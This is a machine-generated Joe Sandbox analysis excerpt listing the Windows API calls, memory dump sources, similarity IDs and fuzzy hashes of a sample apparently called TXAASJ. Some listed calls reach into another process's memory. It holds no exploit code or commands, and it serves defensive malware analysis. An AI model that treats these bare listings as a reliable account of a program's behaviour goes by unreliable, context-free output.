                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00E8B3CB,?,?,?), ref: 00E8B91C
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00E8B3CB,?,?,?), ref: 00E8B923
                                                                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00E8B93A
                                                                                                                        APIs
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E98371
                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00E9837F
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E98387
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00E98391
                                                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E983CD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                         • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2833360925-0
                                                                                                                        • Opcode ID: d9934cd93c73c4ac86f6af11a96965e13f1a73a867dcc90976b4f6e4dd109d11
                                                                                                                        • Instruction ID: 6c04c65fad8696f5e713bfe2667146f7dd26a48a5a11541f26b9ee7224a64ea2
                                                                                                                        • Opcode Fuzzy Hash: d9934cd93c73c4ac86f6af11a96965e13f1a73a867dcc90976b4f6e4dd109d11
                                                                                                                        • Instruction Fuzzy Hash: CF012931D06629DFCF00EFA5EE49AEEBB78FB09B11F001056E941B2160DF70955587A1
                                                                                                                        APIs
                                                                                                                        • CLSIDFromProgID.OLE32 ref: 00E8A874
                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000), ref: 00E8A88F
                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 00E8A89D
                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00E8A8AD
                                                                                                                        • CLSIDFromString.OLE32(?,?), ref: 00E8A8B9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                         • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3897988419-0
                                                                                                                        • Opcode ID: a2fabca6523e3dc4cc31203bf38c4964d00c5265b11340df2ea74fc3d53c6ce8
                                                                                                                        • Instruction ID: 13d10e1e241905863b048a0e0b593be47abc2ccad77cf6d9a56a9a7cacd43142
                                                                                                                        • Opcode Fuzzy Hash: a2fabca6523e3dc4cc31203bf38c4964d00c5265b11340df2ea74fc3d53c6ce8
                                                                                                                        • Instruction Fuzzy Hash: CA01DF7A601204AFEB096F15EC48BAA7BEDEF44391F184036B809F2210D730DD059BB1
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E8B806
                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E8B810
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E8B81F
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E8B826
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E8B83C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                         • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 44706859-0
                                                                                                                        • Opcode ID: ca91a5ac62735654487efd5baf0cdd4ecebc8b97b0da6dcd9e08247c89dbeec3
                                                                                                                        • Instruction ID: 1f058dc54c940ecc2d55fcdbe916ca4a98c314262da560129297a7a4128d22a2
                                                                                                                        • Opcode Fuzzy Hash: ca91a5ac62735654487efd5baf0cdd4ecebc8b97b0da6dcd9e08247c89dbeec3
                                                                                                                        • Instruction Fuzzy Hash: 37F04F752462047FEB212FA6FC88E673B6DFF46768F00402AF949EB150CB609845CB60
                                                                                                                        APIs
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E8B7A5
                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E8B7AF
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E8B7BE
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E8B7C5
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E8B7DB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                         • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 44706859-0
                                                                                                                        • Opcode ID: 916b5cee4a2e8aa6e8ebd6e0372c96ac37ada1311709f865edb6ed1b2ee05628
                                                                                                                        • Instruction ID: 43ed44397625225dc7d63bb2adc5327530fcf8144af5ecb405694ef340bdb39a
                                                                                                                        • Opcode Fuzzy Hash: 916b5cee4a2e8aa6e8ebd6e0372c96ac37ada1311709f865edb6ed1b2ee05628
                                                                                                                        • Instruction Fuzzy Hash: 71F0AF712423047FEB102FA6AC88E673BADFF86B59F00411BF908E7151CB619C058B60
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00E8FA8F
                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E8FAA6
                                                                                                                        • MessageBeep.USER32(00000000), ref: 00E8FABE
                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 00E8FADA
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00E8FAF4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                         • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3741023627-0
                                                                                                                        • Opcode ID: 5d4fa570fcce1f843a23049537ec2edc61ea0bb39e4dddc670833e061c40f173
                                                                                                                        • Instruction ID: d50aa7bfe6a8e3841030c52da10596e0780bbd3f4c24cb0811dae426edfdc1ab
                                                                                                                        • Opcode Fuzzy Hash: 5d4fa570fcce1f843a23049537ec2edc61ea0bb39e4dddc670833e061c40f173
                                                                                                                        • Instruction Fuzzy Hash: E9016230504704AFEB24AB21ED4EB9677BCFB00719F0416AAE58FB50E0DBE0A9488B40
                                                                                                                        APIs
                                                                                                                        • EndPath.GDI32(?), ref: 00E6B526
                                                                                                                        • StrokeAndFillPath.GDI32(?,?,00ECF583,00000000,?), ref: 00E6B542
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00E6B555
                                                                                                                        • DeleteObject.GDI32 ref: 00E6B568
                                                                                                                        • StrokePath.GDI32(?), ref: 00E6B583
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                         • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2625713937-0
                                                                                                                        • Opcode ID: 930297ae167dd9768ae6448878f440c72207053bb030a28500df353e8bee1ae4
                                                                                                                        • Instruction ID: c59f80f9bc22d8fd953c4711a950e6992ba2ef32d5c769c986d30c25f7b9465d
                                                                                                                        • Opcode Fuzzy Hash: 930297ae167dd9768ae6448878f440c72207053bb030a28500df353e8bee1ae4
                                                                                                                        • Instruction Fuzzy Hash: 40F0B630046208AFDB155F29FD087E43FA6F701376F19D215E5A6A41F0C7318999EF50
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00E9FAB2
                                                                                                                        • CoCreateInstance.OLE32(00EDDA7C,00000000,00000001,00EDD8EC,?), ref: 00E9FACA
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • CoUninitialize.OLE32 ref: 00E9FD2D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                         • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                        • String ID: .lnk
                                                                                                                        • API String ID: 2683427295-24824748
                                                                                                                        • Opcode ID: 60399b7ce68d7609ce42a1f4081546e407e9c6cdabd724cbcc7dd0cacd831233
                                                                                                                        • Instruction ID: 664decb2687554b4c01a14211e8668f3a8e7ca3830e2b919dd6dff212fc1e4fb
                                                                                                                        • Opcode Fuzzy Hash: 60399b7ce68d7609ce42a1f4081546e407e9c6cdabd724cbcc7dd0cacd831233
                                                                                                                        • Instruction Fuzzy Hash: 61A14971508305AFC700EF64CC91EABB7ECEF88704F40591DB556A7292EB70EA09CB92
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E978AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00E978CB
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00E9F04D
                                                                                                                        • CoCreateInstance.OLE32(00EDDA7C,00000000,00000001,00EDD8EC,?), ref: 00E9F066
                                                                                                                        • CoUninitialize.OLE32 ref: 00E9F083
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                         • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                         • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                        • String ID: .lnk
                                                                                                                        • API String ID: 2126378814-24824748
                                                                                                                        APIs
                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00E73F7D
                                                                                                                          • Part of subcall function 00E7EE80: __87except.LIBCMT ref: 00E7EEBB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorHandling__87except__start
                                                                                                                        • String ID: pow
                                                                                                                        • API String ID: 2905807303-2276729525
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: #$+
                                                                                                                        • API String ID: 0-2552117581
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00EEDC40,?,0000000F,0000000C,00000016,00EEDC40,?), ref: 00E9507B
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                          • Part of subcall function 00E5B8A7: _memmove.LIBCMT ref: 00E5B8FB
                                                                                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00E950FB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                        • String ID: REMOVE$THIS
                                                                                                                        • API String ID: 2528338962-776492005
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E94D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E8C9FE,?,?,00000034,00000800,?,00000034), ref: 00E94D6B
                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E8CFC9
                                                                                                                          • Part of subcall function 00E94D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E8CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00E94D36
                                                                                                                          • Part of subcall function 00E94C65: GetWindowThreadProcessId.USER32(?,?), ref: 00E94C90
                                                                                                                          • Part of subcall function 00E94C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E8C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00E94CA0
                                                                                                                          • Part of subcall function 00E94C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E8C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00E94CB6
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E8D036
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E8D083
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00EEDBF0,00000000,?,?,?,?), ref: 00EBA4E6
                                                                                                                        • GetWindowLongW.USER32 ref: 00EBA503
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EBA513
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long
                                                                                                                        • String ID: SysTreeView32
                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00EA57E7
                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00EA581D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CrackInternet_memset
                                                                                                                        • String ID: ?K$|
                                                                                                                        • API String ID: 1413715105-747655002
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EB9F6B
                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EB9F7F
                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EB9FA3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window
                                                                                                                        • String ID: SysMonthCal32
                                                                                                                        • API String ID: 2326795674-1439706946
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EBA74F
                                                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EBA75D
                                                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EBA764
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                                                        • String ID: msctls_updown32
                                                                                                                        • API String ID: 4014797782-2298589950
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EB983D
                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EB984D
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EB9872
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                        • String ID: Listbox
                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EBA27B
                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EBA290
                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EBA29D
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E73028,?), ref: 00E72F79
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00E72F80
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: RoInitialize$combase.dll
                                                                                                                        • API String ID: 2574300362-340411864
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E72F4E), ref: 00E7304E
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00E73055
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                                                        • API String ID: 2574300362-2819208100
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime__swprintf
                                                                                                                        • String ID: %.3d$WIN_XPe
                                                                                                                        • API String ID: 2070861257-2409531811
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00E6E6D9,?,00E6E55B,00EEDC28,?,?), ref: 00E6E6F1
                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00E6E703
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: IsWow64Process$kernel32.dll
                                                                                                                        • API String ID: 2574300362-3024904723
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00E6E69C,76230AE0,00E6E5AC,00EEDC28,?,?), ref: 00E6E6B4
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E6E6C6
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                        • API String ID: 2574300362-192647395
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00EAEBAF,?,00EAEAAC), ref: 00EAEBC7
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EAEBD9
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                        • API String ID: 2574300362-1816364905
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00E91371,?,00E91519), ref: 00E913B4
                                                                                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00E913C6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                        • API String ID: 2574300362-1587604923
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,00E9135F,?,00E91440), ref: 00E91389
                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00E9139B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                        • API String ID: 2574300362-1071820185
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00EB3AC2,?,00EB3CF7), ref: 00EB3ADA
                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EB3AEC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
